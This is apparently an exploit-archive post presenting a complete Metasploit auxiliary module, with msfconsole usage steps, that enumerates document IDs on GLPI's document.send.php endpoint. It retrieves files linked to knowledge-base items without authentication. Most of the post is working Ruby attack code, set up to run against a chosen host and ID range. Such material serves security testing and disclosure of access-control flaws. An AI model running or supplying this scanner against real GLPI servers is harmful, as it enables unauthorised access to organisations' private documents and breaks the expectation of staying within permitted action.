📄 GLPI Accessible Documents Insecure Direct Object Reference

=============================================================================================================================================
    | # Title     : GLPI Accessible Documents IDOR Scanner – Metasploit Auxiliary Module                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.glpi-project.org/en/                                                                                            |
    =============================================================================================================================================
    
    [+] Summary    :  This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint.
                      The module performs an automated enumeration of docid values within a defined range and attempts to access documents without authentication. 
    				  If the server responds with HTTP 200 and a non-HTML content type (e.g., PDF, image, ZIP, etc.), the module flags it as a potential Insecure Direct Object Reference (IDOR) vulnerability.
    
    [+] The scanner:
    
    Iterates over a configurable docid range
    
    Targets KnowbaseItem document associations
    
    Validates responses based on allowed content types
    
    Reports accessible documents that may indicate improper access control
    
    This module is intended for authorized security testing to identify access control misconfigurations in GLPI deployments.
    
    [+] POC : 
    
    modules/auxiliary/scanner/http/glpi_doc_idor.rb
    
    msfconsole
    msf > reload_all
    
    use auxiliary/scanner/http/glpi_doc_idor
    set RHOST 10.0.0.1
    set RPORT 80
    set TARGETURI /
    set ITEMS_ID 123
    set DOCID_START 1
    set DOCID_END 100
    run
    
    
    
    ##
    # This module requires Metasploit Framework
    # Tested with Metasploit 6.x
    ##
    
    require 'msf/core'
    require 'uri'
    require 'net/http'
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'GLPI Accessible Documents IDOR Scanner',
          'Description'    => %q{
            Scans a GLPI installation for accessible KnowbaseItem documents without authentication.
            This checks for possible IDOR vulnerabilities by iterating docid values.
          },
          'Author'         => ['Indoushka'],
          'License'        => MSF_LICENSE
        ))
    
        register_options(
          [
            Opt::RHOST(),
            Opt::RPORT(80),
            OptString.new('TARGETURI', [true, "Base path of GLPI", '/']),
            OptInt.new('ITEMS_ID', [true, "Items ID to test", 1]),
            OptInt.new('DOCID_START', [true, "Starting docid", 1]),
            OptInt.new('DOCID_END', [true, "Ending docid", 100])
          ]
        )
    
        register_advanced_options(
          [
            OptBool.new('SSL', [true, "Use SSL", false])
          ]
        )
      end
    
      def check_content_type(resp)
        return false if resp.nil? || resp['Content-Type'].nil?
        ct = resp['Content-Type'].downcase
        allowed = ["image/", "application/pdf", "application/xml", "text/xml", "text/csv",
                   "application/zip", "application/x-rar-compressed", "application/x-gzip",
                   "audio/", "video/", "application/postscript", "image/svg+xml",
                   "application/x-shockwave-flash", "application/x-tar", "application/x-bzip2",
                   "application/x-7z-compressed", "application/vnd.ms-excel", "application/msword"]
        allowed.any? { |sub| ct.include?(sub) } && !ct.include?("text/html")
      end
    
      def run
        start_id = datastore['DOCID_START']
        end_id   = datastore['DOCID_END']
        items_id = datastore['ITEMS_ID']
        base_uri = normalize_uri(datastore['TARGETURI'])
        use_ssl = datastore['SSL']
    
        (start_id..end_id).each do |docid|
          target_url = "#{base_uri}/front/document.send.php?docid=#{docid}&itemtype=KnowbaseItem&items_id=#{items_id}"
    
          begin
            res = send_request_cgi({
              'uri'     => target_url,
              'method'  => 'GET',
              'headers' => {
                'User-Agent' => 'Mozilla/5.0 (compatible; GLPI-Doc-Checker/1.1)'
              }
            })
    
            next if res.nil?
    
            if res.code == 200 && check_content_type(res)
              print_good("#{rhost}:#{rport}#{target_url} -> #{res['Content-Type']} - vulnerability found")
            elsif framework.debug?
              print_status("Skipped #{target_url} -> #{res.code} -> #{res['Content-Type']}")
            end
    
          rescue ::Rex::ConnectionError => e
            print_error("Connection error: #{e}")
          end
        end
      end
    end
    
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================